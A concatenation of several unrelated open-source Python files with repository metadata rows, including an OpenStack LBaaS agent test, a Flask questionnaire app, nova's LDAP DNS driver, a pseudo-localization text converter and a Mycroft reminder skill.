self.assertRaises(NotImplementedError, lambda: instance.set_values(x, x, x))
def test_modbus_payload_builder_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IPayloadBuilder()
self.assertRaises(NotImplementedError, lambda: instance.build())
#---------------------------------------------------------------------------#
# Main
#---------------------------------------------------------------------------#
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -7,825,868,380,045,185,000 | 38.283582 | 94 | 0.639818 | false |
alex/remoteobjects | remoteobjects/dataobject.py | 1 | 9213 | # Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
`DataObject` is a class of object that provides coding between object
attributes and dictionaries, suitable for
In `DataObject` is the mechanism for converting between dictionaries and
objects. These conversions are performed with aid of `Field` instances
declared on `DataObject` subclasses. `Field` classes reside in the
`remoteobjects.field` module.
"""
from copy import deepcopy
import logging
import remoteobjects.fields
classes_by_name = {}
classes_by_constant_field = {}
def find_by_name(name):
"""Finds and returns the DataObject subclass with the given name.
Parameter `name` should be a bare class name with no module. If there is
no class by that name, raises `KeyError`.
"""
return classes_by_name[name]
class DataObjectMetaclass(type):
"""Metaclass for `DataObject` classes.
This metaclass installs all `remoteobjects.fields.Property` instances
declared as attributes of the new class, including all `Field` and `Link`
instances.
This metaclass also makes the new class findable through the
`dataobject.find_by_name()` function.
"""
def __new__(cls, name, bases, attrs):
"""Creates and returns a new `DataObject` class with its declared
fields and name."""
fields = {}
new_fields = {}
new_properties = {}
# Inherit all the parent DataObject classes' fields.
for base in bases:
if isinstance(base, DataObjectMetaclass):
fields.update(base.fields)
# Move all the class's attributes that are Fields to the fields set.
for attrname, field in attrs.items():
if isinstance(field, remoteobjects.fields.Property):
new_properties[attrname] = field
if isinstance(field, remoteobjects.fields.Field):
new_fields[attrname] = field
elif attrname in fields:
# Throw out any parent fields that the subclass defined as
# something other than a Field.
del fields[attrname]
fields.update(new_fields)
attrs['fields'] = fields
obj_cls = super(DataObjectMetaclass, cls).__new__(cls, name, bases, attrs)
for field, value in new_properties.items():
obj_cls.add_to_class(field, value)
# Register the new class so Object fields can have forward-referenced it.
classes_by_name[name] = obj_cls
# Tell this class's fields what this class is, so they can find their
# forward references later.
for field in new_properties.values():
field.of_cls = obj_cls
return obj_cls
def add_to_class(cls, name, value):
try:
value.install(name, cls)
except (NotImplementedError, AttributeError):
setattr(cls, name, value)
class DataObject(object):
"""An object that can be decoded from or encoded as a dictionary.
DataObject subclasses should be declared with their different data
attributes defined as instances of fields from the `remoteobjects.fields`
module. For example:
>>> from remoteobjects import DataObject, fields
>>> class Asset(DataObject):
... name = fields.Field()
... updated = fields.Datetime()
... author = fields.Object('Author')
...
A DataObject's fields then provide the coding between live DataObject
instances and dictionaries.
"""
__metaclass__ = DataObjectMetaclass
def __init__(self, **kwargs):
"""Initializes a new `DataObject` with the given field values."""
self.api_data = {}
self.__dict__.update(kwargs)
def __eq__(self, other):
"""Returns whether two `DataObject` instances are equivalent.
If the `DataObject` instances are of the same type and contain the
same data in all their fields, the objects are equivalent.
"""
if type(self) != type(other):
return False
for k, v in self.fields.iteritems():
if isinstance(v, remoteobjects.fields.Field):
if getattr(self, k) != getattr(other, k):
return False
return True
def __ne__(self, other):
"""Returns whether two `DataObject` instances are different.
`DataObject` instances are different if they are not equivalent as
determined through `__eq__()`.
"""
return not self == other
@classmethod
def statefields(cls):
return cls.fields.keys() + ['api_data']
def __getstate__(self):
return dict((k, self.__dict__[k]) for k in self.statefields()
if k in self.__dict__)
def to_dict(self):
"""Encodes the DataObject to a dictionary."""
data = deepcopy(self.api_data)
for field_name, field in self.fields.iteritems():
value = getattr(self, field.attrname, None)
if value is not None:
data[field.api_name] = field.encode(value)
return data
@classmethod
def from_dict(cls, data):
"""Decodes a dictionary into a new `DataObject` instance."""
self = cls()
self.update_from_dict(data)
return self
def update_from_dict(self, data):
"""Adds the content of a dictionary to this DataObject.
Parameter `data` is the dictionary from which to update the object.
Use this only when receiving newly updated or partial content for a
DataObject; that is, when the data is from the outside data source and
needs decoded through the object's fields. Data from "inside" your
application should be added to an object manually by setting the
object's attributes. Data that constitutes a new object should be
turned into another object with `from_dict()`.
"""
if not isinstance(data, dict):
raise TypeError
# Clear any local instance field data
for k in self.fields.iterkeys():
if k in self.__dict__:
del self.__dict__[k]
self.api_data = data
@classmethod
def subclass_with_constant_field(cls, fieldname, value):
"""Returns the closest subclass of this class that has a `Constant`
field with the given value.
Use this method in combination with the `fields.Constant` field class
to find the most appropriate subclass of `cls` based on a content
field. For example, if you have an ``Asset`` class, but want to
declare subclasses with special behavior based on the ``kind`` field
of the ``Asset`` instances, declare ``kind`` as a `Constant` field on
each subclass. Then when you want to create a new ``Asset`` instance
(as in ``Asset.from_dict()``), you can use this method to select a
more appropriate class to instantiate.
Parameters `fieldname` and `value` are the name and value of the
`Constant` field for which to search respectively.
If a subclass of `cls` has been declared with a `Constant` field of
the given name and value, it will be returned. If multiple subclasses
of `cls` declare a matching `Constant` field, one of the matching
subclasses will be returned, but which subclass is not defined.
"""
try:
clsname = classes_by_constant_field[fieldname][tuple(value)]
except KeyError:
# No matching classes, then.
pass
else:
return find_by_name(clsname)
raise ValueError('No such subclass of %s with field %r equivalent to %r'
% (cls.__name__, fieldname, value))
| bsd-3-clause | -8,214,878,308,252,101,000 | 35.852 | 82 | 0.655704 | false |
cernops/neutron | neutron/tests/unit/services/loadbalancer/agent/test_api.py | 6 | 4603 | # Copyright 2013 New Dream Network, LLC (DreamHost)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.services.loadbalancer.agent import agent_api as api
from neutron.tests import base
class TestApiCache(base.BaseTestCase):
def setUp(self):
super(TestApiCache, self).setUp()
self.api = api.LbaasAgentApi('topic', mock.sentinel.context, 'host')
self.make_msg = mock.patch.object(self.api, 'make_msg').start()
self.mock_call = mock.patch.object(self.api, 'call').start()
def test_init(self):
self.assertEqual(self.api.host, 'host')
self.assertEqual(self.api.context, mock.sentinel.context)
def test_get_ready_devices(self):
self.assertEqual(
self.api.get_ready_devices(),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with('get_ready_devices', host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_get_logical_device(self):
self.assertEqual(
self.api.get_logical_device('pool_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'get_logical_device',
pool_id='pool_id')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_pool_destroyed(self):
self.assertEqual(
self.api.pool_destroyed('pool_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'pool_destroyed',
pool_id='pool_id')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_pool_deployed(self):
self.assertEqual(
self.api.pool_deployed('pool_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'pool_deployed',
pool_id='pool_id')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_update_status(self):
self.assertEqual(
self.api.update_status('pool', 'pool_id', 'ACTIVE'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'update_status',
obj_type='pool',
obj_id='pool_id',
status='ACTIVE')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value,
)
def test_plug_vip_port(self):
self.assertEqual(
self.api.plug_vip_port('port_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'plug_vip_port',
port_id='port_id',
host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_unplug_vip_port(self):
self.assertEqual(
self.api.unplug_vip_port('port_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'unplug_vip_port',
port_id='port_id',
host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_update_pool_stats(self):
self.assertEqual(
self.api.update_pool_stats('pool_id', {'stat': 'stat'}),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'update_pool_stats',
pool_id='pool_id',
stats={'stat': 'stat'},
host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
| apache-2.0 | 8,646,123,773,261,513,000 | 28.88961 | 79 | 0.578318 | false |
nitrocode/challenge-questionaire | app/app.py | 1 | 2601 | #!/usr/bin/env python
import questions
import json
from flask import Flask, render_template, request
# this has to be defined here
app = Flask(__name__)
app.config['DEBUG'] = True
qdata = None
@app.route('/')
def test():
return render_template('test.html')
@app.route('/edit')
def edit():
return render_template('edit.html')
def get_questions(page=None):
"""Get the questions and answers and store in a global variable.
:return: list of JSON documents
:rtype: list
"""
global qdata
page_size = 10
# g does not persist the global variable for some reason...
# qdata = getattr(g, '_questions', None)
if qdata is None:
# qdata = g._questions = questions.parse()
qdata = questions.parse()
try:
page = int(page)
except:
return qdata
try:
if page > 0 and page <= len(qdata) / page_size:
return qdata[(page - 1) * page_size : page * page_size]
except:
pass
return qdata
@app.route('/questions')
@app.route('/questions/')
@app.route('/questions/<int:page>')
def all_questions(page=None):
"""Return all questions by page.
:param int page: id
:return:
:rtype: dict
"""
questions = get_questions(page=page)
return json.dumps({
'data': questions,
'count': len(questions)
})
@app.route('/question/',
methods=['POST'], defaults={'qid':-1})
@app.route('/question/<int:qid>',
methods=['PUT', 'GET', 'DELETE'])
def question(qid):
"""Get or modify a question.
:param int qid: question id
:return: question and answers
:rtype: str
"""
global qdata
tmp_qdata = get_questions()
try:
tmp_qdata[int(qid)]
except:
qid = 0
# return a question as a JSON object
if request.method == 'GET':
return json.dumps(tmp_qdata[qid])
# insert/modify the question
elif request.method in ['PUT', 'POST']:
data = {
'answer': request.form['answer'],
'question': request.form['question'],
'distractors': request.form.getlist('distractors[]')
}
# modify the question
if request.method == 'PUT':
data['id'] = qid
tmp_qdata[qid] = data
print(tmp_qdata[qid])
# insert new question
else:
data['id'] = tmp_qdata[-1]['id'] + 1
tmp_qdata.append(data)
# remove from array
elif request.method in ['DELETE']:
del tmp_qdata[qid]
qdata = tmp_qdata
return ''
if __name__ == '__main__':
app.run()
| mit | 7,117,368,930,344,871,000 | 22.862385 | 68 | 0.569781 | false |
NewpTone/stacklab-nova | nova/network/ldapdns.py | 7 | 13353 | # Copyright 2012 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ldap
import time
from nova.auth import fakeldap
from nova import exception
from nova import flags
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova import utils
LOG = logging.getLogger(__name__)
ldap_dns_opts = [
cfg.StrOpt('ldap_dns_url',
default='ldap://ldap.example.com:389',
help='URL for ldap server which will store dns entries'),
cfg.StrOpt('ldap_dns_user',
default='uid=admin,ou=people,dc=example,dc=org',
help='user for ldap DNS'),
cfg.StrOpt('ldap_dns_password',
default='password',
help='password for ldap DNS'),
cfg.StrOpt('ldap_dns_soa_hostmaster',
default='[email protected]',
help='Hostmaster for ldap dns driver Statement of Authority'),
cfg.MultiStrOpt('ldap_dns_servers',
default=['dns.example.org'],
help='DNS Servers for ldap dns driver'),
cfg.StrOpt('ldap_dns_base_dn',
default='ou=hosts,dc=example,dc=org',
help='Base DN for DNS entries in ldap'),
cfg.StrOpt('ldap_dns_soa_refresh',
default='1800',
help='Refresh interval (in seconds) for ldap dns driver '
'Statement of Authority'),
cfg.StrOpt('ldap_dns_soa_retry',
default='3600',
help='Retry interval (in seconds) for ldap dns driver '
'Statement of Authority'),
cfg.StrOpt('ldap_dns_soa_expiry',
default='86400',
help='Expiry interval (in seconds) for ldap dns driver '
'Statement of Authority'),
cfg.StrOpt('ldap_dns_soa_minimum',
default='7200',
help='Minimum interval (in seconds) for ldap dns driver '
'Statement of Authority'),
]
flags.FLAGS.register_opts(ldap_dns_opts)
# Importing ldap.modlist breaks the tests for some reason,
# so this is an abbreviated version of a function from
# there.
def create_modlist(newattrs):
modlist = []
for attrtype in newattrs.keys():
utf8_vals = []
for val in newattrs[attrtype]:
utf8_vals.append(utils.utf8(val))
newattrs[attrtype] = utf8_vals
modlist.append((attrtype, newattrs[attrtype]))
return modlist
class DNSEntry(object):
def __init__(self, ldap_object):
"""ldap_object is an instance of ldap.LDAPObject.
It should already be initialized and bound before
getting passed in here."""
self.lobj = ldap_object
self.ldap_tuple = None
self.qualified_domain = None
@classmethod
def _get_tuple_for_domain(cls, lobj, domain):
entry = lobj.search_s(flags.FLAGS.ldap_dns_base_dn, ldap.SCOPE_SUBTREE,
'(associatedDomain=%s)' % utils.utf8(domain))
if not entry:
return None
if len(entry) > 1:
LOG.warn("Found multiple matches for domain %s.\n%s" %
(domain, entry))
return entry[0]
@classmethod
def _get_all_domains(cls, lobj):
entries = lobj.search_s(flags.FLAGS.ldap_dns_base_dn,
ldap.SCOPE_SUBTREE, '(sOARecord=*)')
domains = []
for entry in entries:
domain = entry[1].get('associatedDomain')
if domain:
domains.append(domain[0])
return domains
def _set_tuple(self, tuple):
self.ldap_tuple = tuple
def _qualify(self, name):
return '%s.%s' % (name, self.qualified_domain)
def _dequalify(self, name):
z = ".%s" % self.qualified_domain
if name.endswith(z):
dequalified = name[0:name.rfind(z)]
else:
LOG.warn("Unable to dequalify. %s is not in %s.\n" %
(name, self.qualified_domain))
dequalified = None
return dequalified
def _dn(self):
return self.ldap_tuple[0]
dn = property(_dn)
def _rdn(self):
return self.dn.partition(',')[0]
rdn = property(_rdn)
class DomainEntry(DNSEntry):
@classmethod
def _soa(cls):
date = time.strftime('%Y%m%d%H%M%S')
soa = '%s %s %s %s %s %s %s' % (
flags.FLAGS.ldap_dns_servers[0],
flags.FLAGS.ldap_dns_soa_hostmaster,
date,
flags.FLAGS.ldap_dns_soa_refresh,
flags.FLAGS.ldap_dns_soa_retry,
flags.FLAGS.ldap_dns_soa_expiry,
flags.FLAGS.ldap_dns_soa_minimum)
return utils.utf8(soa)
@classmethod
def create_domain(cls, lobj, domain):
"""Create a new domain entry, and return an object that wraps it."""
entry = cls._get_tuple_for_domain(lobj, domain)
if entry:
raise exception.FloatingIpDNSExists(name=domain, domain='')
newdn = 'dc=%s,%s' % (domain, flags.FLAGS.ldap_dns_base_dn)
attrs = {'objectClass': ['domainrelatedobject', 'dnsdomain',
'domain', 'dcobject', 'top'],
'sOARecord': [cls._soa()],
'associatedDomain': [domain],
'dc': [domain]}
lobj.add_s(newdn, create_modlist(attrs))
return DomainEntry(lobj, domain)
def __init__(self, ldap_object, domain):
super(DomainEntry, self).__init__(ldap_object)
entry = self._get_tuple_for_domain(self.lobj, domain)
if not entry:
raise exception.NotFound()
self._set_tuple(entry)
assert(entry[1]['associatedDomain'][0] == domain)
self.qualified_domain = domain
def delete(self):
"""Delete the domain that this entry refers to."""
entries = self.lobj.search_s(self.dn,
ldap.SCOPE_SUBTREE,
'(aRecord=*)')
for entry in entries:
self.lobj.delete_s(entry[0])
self.lobj.delete_s(self.dn)
def update_soa(self):
mlist = [(ldap.MOD_REPLACE, 'sOARecord', self._soa())]
self.lobj.modify_s(self.dn, mlist)
def subentry_with_name(self, name):
entry = self.lobj.search_s(self.dn, ldap.SCOPE_SUBTREE,
'(associatedDomain=%s.%s)' %
(utils.utf8(name),
utils.utf8(self.qualified_domain)))
if entry:
return HostEntry(self, entry[0])
else:
return None
def subentries_with_ip(self, ip):
entries = self.lobj.search_s(self.dn, ldap.SCOPE_SUBTREE,
'(aRecord=%s)' % utils.utf8(ip))
objs = []
for entry in entries:
if 'associatedDomain' in entry[1]:
objs.append(HostEntry(self, entry))
return objs
def add_entry(self, name, address):
if self.subentry_with_name(name):
raise exception.FloatingIpDNSExists(name=name,
domain=self.qualified_domain)
entries = self.subentries_with_ip(address)
if entries:
# We already have an ldap entry for this IP, so we just
# need to add the new name.
existingdn = entries[0].dn
self.lobj.modify_s(existingdn, [(ldap.MOD_ADD,
'associatedDomain',
utils.utf8(self._qualify(name)))])
return self.subentry_with_name(name)
else:
# We need to create an entirely new entry.
newdn = 'dc=%s,%s' % (name, self.dn)
attrs = {'objectClass': ['domainrelatedobject', 'dnsdomain',
'domain', 'dcobject', 'top'],
'aRecord': [address],
'associatedDomain': [self._qualify(name)],
'dc': [name]}
self.lobj.add_s(newdn, create_modlist(attrs))
return self.subentry_with_name(name)
self.update_soa()
def remove_entry(self, name):
entry = self.subentry_with_name(name)
if not entry:
raise exception.NotFound()
entry.remove_name(name)
self.update_soa()
class HostEntry(DNSEntry):
def __init__(self, parent, tuple):
super(HostEntry, self).__init__(parent.lobj)
self.parent_entry = parent
self._set_tuple(tuple)
self.qualified_domain = parent.qualified_domain
def remove_name(self, name):
names = self.ldap_tuple[1]['associatedDomain']
if not names:
raise exception.NotFound()
if len(names) > 1:
# We just have to remove the requested domain.
self.lobj.modify_s(self.dn, [(ldap.MOD_DELETE, 'associatedDomain',
self._qualify(utils.utf8(name)))])
if (self.rdn[1] == name):
# We just removed the rdn, so we need to move this entry.
names.remove(self._qualify(name))
newrdn = 'dc=%s' % self._dequalify(names[0])
self.lobj.modrdn_s(self.dn, [newrdn])
else:
# We should delete the entire record.
self.lobj.delete_s(self.dn)
def modify_address(self, name, address):
names = self.ldap_tuple[1]['associatedDomain']
if not names:
raise exception.NotFound()
if len(names) == 1:
self.lobj.modify_s(self.dn, [(ldap.MOD_REPLACE, 'aRecord',
[utils.utf8(address)])])
else:
self.remove_name(name)
self.parent.add_entry(name, address)
def _names(self):
names = []
for domain in self.ldap_tuple[1]['associatedDomain']:
names.append(self._dequalify(domain))
return names
names = property(_names)
def _ip(self):
ip = self.ldap_tuple[1]['aRecord'][0]
return ip
ip = property(_ip)
def _parent(self):
return self.parent_entry
parent = property(_parent)
class LdapDNS(object):
"""Driver for PowerDNS using ldap as a back end.
This driver assumes ldap-method=strict, with all domains
in the top-level, aRecords only."""
def __init__(self):
self.lobj = ldap.initialize(flags.FLAGS.ldap_dns_url)
self.lobj.simple_bind_s(flags.FLAGS.ldap_dns_user,
flags.FLAGS.ldap_dns_password)
def get_domains(self):
return DomainEntry._get_all_domains(self.lobj)
def create_entry(self, name, address, type, domain):
if type.lower() != 'a':
raise exception.InvalidInput(_("This driver only supports "
"type 'a' entries."))
dEntry = DomainEntry(self.lobj, domain)
dEntry.add_entry(name, address)
def delete_entry(self, name, domain):
dEntry = DomainEntry(self.lobj, domain)
dEntry.remove_entry(name)
def get_entries_by_address(self, address, domain):
try:
dEntry = DomainEntry(self.lobj, domain)
except exception.NotFound:
return []
entries = dEntry.subentries_with_ip(address)
names = []
for entry in entries:
names.extend(entry.names)
return names
def get_entries_by_name(self, name, domain):
try:
dEntry = DomainEntry(self.lobj, domain)
except exception.NotFound:
return []
nEntry = dEntry.subentry_with_name(name)
if nEntry:
return [nEntry.ip]
def modify_address(self, name, address, domain):
dEntry = DomainEntry(self.lobj, domain)
nEntry = dEntry.subentry_with_name(name)
nEntry.modify_address(name, address)
def create_domain(self, domain):
DomainEntry.create_domain(self.lobj, domain)
def delete_domain(self, domain):
dEntry = DomainEntry(self.lobj, domain)
dEntry.delete()
def delete_dns_file(self):
LOG.warn("This shouldn't be getting called except during testing.")
pass
class FakeLdapDNS(LdapDNS):
"""For testing purposes, a DNS driver backed with a fake ldap driver."""
def __init__(self):
self.lobj = fakeldap.FakeLDAP()
attrs = {'objectClass': ['domainrelatedobject', 'dnsdomain',
'domain', 'dcobject', 'top'],
'associateddomain': ['root'],
'dc': ['root']}
self.lobj.add_s(flags.FLAGS.ldap_dns_base_dn, create_modlist(attrs))
| apache-2.0 | -2,508,662,527,030,706,000 | 34.798928 | 79 | 0.558751 | false |
perfectsearch/sandman | code/buildscripts/l10n/martian.py | 1 | 3863 | #!/usr/bin/env python
#
# $Id: martian.py 9318 2011-06-10 02:37:10Z nathan_george $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import random, re
_SUBST = {
'a': [u'a',u'\u00e1',u'\u00e2',u'\u00e3',u'\u00e5',u'\u0430',u'\u0410',u'\u0391',u'\u0386',u'\u03ac',u'\u03b1',u'\u30e0',u'\u30aa',u'\u11ba'],
'e': [u'e',u'\u0415',u'\u0435',u'\u042d',u'\u044d',u'\u0388',u'\u0395',u'\u03b5',u'\u03f5',u'\u03f6',u'\u30e7'],
'i': [u'i',u'\u0407',u'\uff74',u'\u0456',u'\u0457',u'\u03b9',u'\u03af',u'\u03ca',u'\u30a7',u'\u0671'],
'o': [u'o',u'\u03bf',u'\u03cc',u'\uff9b',u'\u00f5',u'\u00f4',u'\u03d9',u'\u1f42',u'\u1f48',u'\u041e',u'\u043e',u'\u30ed',u'\u05e1',u'\u0ae6'],
'u': [u'u',u'\u00b5',u'\u00fa',u'\u00fb',u'\u00fc',u'\u03c5',u'\u03cb',u'\u03cd',u'\u03b0',u'\u0646'],
's': [u's',u'$',u'\u0abd',u'\uff53'],
't': [u't',u'\u03ee',u'\uff34'],
'b': [u'b',u'\u03d0',u'\u00df',u'\uff42'],
'n': [u'n',u'\u00f1'],
}
WORD_PAT = re.compile(u"[a-z]+['a-z][a-z]+", re.IGNORECASE)
UNICODE_TYPE = type(u'')
def endsWithVowel(word):
return u'aeiou'.find(word[-1]) > -1
def convertWord(word):
# Always randomize based on length of word, so that same words get same form.
# This helps to keep the converted forms of complete text files stable as some
# strings are added and subtracted.
r = random.Random(len(word))
startIdx = 0
word2 = u''
# Keep initial caps
if word[0] == word[0].upper():
word2 = word[0]
startIdx = 1
# Substitute chars that are visually similar
for i in range(startIdx, len(word)):
c = word[i]
if c in _SUBST:
alts = _SUBST[c]
word2 = word2 + alts[r.randint(0, len(alts) - 1)]
elif i % 2 == 0:
word2 = word2 + c.upper()
else:
word2 = word2 + c.lower()
# Make words longer, on average, than English.
wordLen = len(word)
if endsWithVowel(word):
justChar = u'h'
else:
justChar = word2[-1]
if wordLen < 5:
word2 = word2 + justChar
else:
extra = r.randint(0, int(max(.5 * wordLen, 3)))
word2 = word2 + u''.rjust(extra, justChar)
return word2
def convert(txt):
if type(txt) != UNICODE_TYPE:
txt = unicode(str(txt), 'utf-8')
# Replace some spaces with x to make words longer (tests whether
# layout handles word wrapping in a flexible and reasonable way).
i = 0
n = 0
while True:
i = txt.find(u' ', i)
if i == -1:
break
# Do a substitution every third word
if (i > 0) and (i < len(txt) - 1) and txt[i-1].isalpha() and txt[i+1].isalpha():
if n % 3 == 1:
txt = txt[0:i] + u'X' + txt[i+1:]
n = n + 1
elif n % 3 != 1:
n = n + 1
i = i + 1
output = u''
while True:
m = WORD_PAT.search(txt)
if not m:
break
output = output + txt[0:m.start()]
output = output + convertWord(m.group(0))
txt = txt[m.end():]
output += txt
# Always put hash marks at beginning and end, so we can easily tell
# if the full string is displayed or only a partial string.
# Ignore @@ comments.
if output.find('@@') > -1:
return u'#' + output[:output.find('@@')] + u'#' + output[output.find('@@'):]
return u'#' + output + '#'
if __name__ == '__main__':
print(convert("almost, this is a test"))
print(convert("&Open"))
print(convert("&Close"))
print(convert("&Next"))
print(convert("The quick brown fox, jumped (smoothly) over the small red dog."))
print(convert("""This is a paragraph of text.
I hope that it all converts smoothly.
The quick brown fox, jumped (smoothly) over the small striped red dog."""))
| mit | 7,911,633,751,153,652,000 | 35.443396 | 146 | 0.550349 | false |
JarbasAI/JarbasAI | jarbas_skills/skill-reminder/__init__.py | 3 | 5237 | # Copyright 2016 Mycroft AI, Inc.
#
# This file is part of Mycroft Core.
#
# Mycroft Core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mycroft Core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mycroft Core. If not, see <http://www.gnu.org/licenses/>.
import time
from alsaaudio import Mixer
from datetime import datetime, timedelta
import re
import yaml
from adapt.intent import IntentBuilder
from os.path import dirname
from mycroft.skills.scheduled_skills import ScheduledCRUDSkill
__author__ = 'jdorleans'
# TODO - Localization, Sandbox
class ReminderSkill(ScheduledCRUDSkill):
PRONOUNS = {'i': 'you', 'me': 'you', 'my': 'your', 'myself': 'yourself',
'am': 'are', "'m": "are", "i'm": "you're"}
def __init__(self):
super(ReminderSkill, self).__init__(
"ReminderSkill", None)
self.reminder_on = False
self.max_delay = self.config.get('max_delay')
self.repeat_time = self.config.get('repeat_time')
self.extended_delay = self.config.get('extended_delay')
def initialize(self):
super(ReminderSkill, self).initialize()
intent = IntentBuilder(
'ReminderSkillStopIntent').require('ReminderSkillStopVerb') \
.require('ReminderSkillKeyword').build()
self.register_intent(intent, self.__handle_stop)
def load_data(self):
try:
with self.file_system.open(self.PENDING_TASK, 'r') as f:
self.data = yaml.safe_load(f)
assert self.data
except:
self.data = {}
def load_repeat_data(self):
try:
with self.file_system.open(self.REPEAT_TASK, 'r') as f:
self.repeat_data = yaml.safe_load(f)
assert self.repeat_data
except:
self.repeat_data = {}
def __handle_stop(self, message):
if self.reminder_on:
self.speak_dialog('reminder.off')
self.reminder_on = False
def notify(self, timestamp):
with self.LOCK:
if self.data.__contains__(timestamp):
volume = None
self.reminder_on = True
delay = self.__calculate_delay(self.max_delay)
while self.reminder_on and datetime.now() < delay:
self.speak_dialog(
'reminder.notify',
data=self.build_feedback_payload(timestamp))
time.sleep(1)
self.speak_dialog('reminder.stop')
time.sleep(self.repeat_time)
if not volume and datetime.now() >= delay:
mixer = Mixer()
volume = mixer.getvolume()[0]
mixer.setvolume(100)
delay = self.__calculate_delay(self.extended_delay)
if volume:
Mixer().setvolume(volume)
self.remove(timestamp)
self.reminder_on = False
self.save()
@staticmethod
def __calculate_delay(seconds):
return datetime.now() + timedelta(seconds=seconds)
def add(self, date, message):
utterance = message.data.get('utterance').lower()
utterance = utterance.replace(
message.data.get('ReminderSkillCreateVerb'), '')
utterance = self.__fix_pronouns(utterance)
self.repeat_data[date] = self.time_rules.get_week_days(utterance)
self.data[date] = self.__remove_time(utterance).strip()
def __fix_pronouns(self, utterance):
msg = utterance.strip()
for key, val in self.PRONOUNS.iteritems():
k = key.lower()
v = val.lower()
msg = msg.replace(' ' + k + ' ', ' ' + v + ' ')
msg = re.sub('^' + key + ' ', val + ' ', msg)
msg = re.sub(' ' + key + '$', ' ' + val, msg)
return msg
def __remove_time(self, utterance):
pos = (0, 0)
for regex in self.time_rules.rules.get('time_regex'):
pattern = re.compile(regex, re.IGNORECASE)
result = pattern.search(utterance)
if result:
span = result.span()
if (pos[1] - pos[0]) < (span[1] - span[0]):
pos = span
msg = utterance[:pos[0]] + utterance[pos[1]:]
if pos[0] != pos[1]:
msg = self.__remove_time(msg)
return msg
def save(self):
with self.file_system.open(self.PENDING_TASK, 'w') as f:
yaml.safe_dump(self.data, f)
with self.file_system.open(self.REPEAT_TASK, 'w') as f:
yaml.safe_dump(self.repeat_data, f)
self.schedule()
def stop(self):
self.__handle_stop(None)
def create_skill():
return ReminderSkill()
| gpl-3.0 | -8,863,748,726,465,021,000 | 34.62585 | 76 | 0.568837 | false |
trimailov/timeflow | timeflow/stats.py | 1 | 10902 | import datetime as dt
import smtplib
from collections import defaultdict
from collections import OrderedDict
from timeflow.settings import Settings
from timeflow.utils import DATE_FORMAT
from timeflow.utils import DATETIME_FORMAT
from timeflow.utils import calc_time_diff
from timeflow.utils import date_begins
from timeflow.utils import date_ends
from timeflow.utils import format_duration_long
from timeflow.utils import format_duration_short
from timeflow.utils import get_time
from timeflow.utils import parse_lines
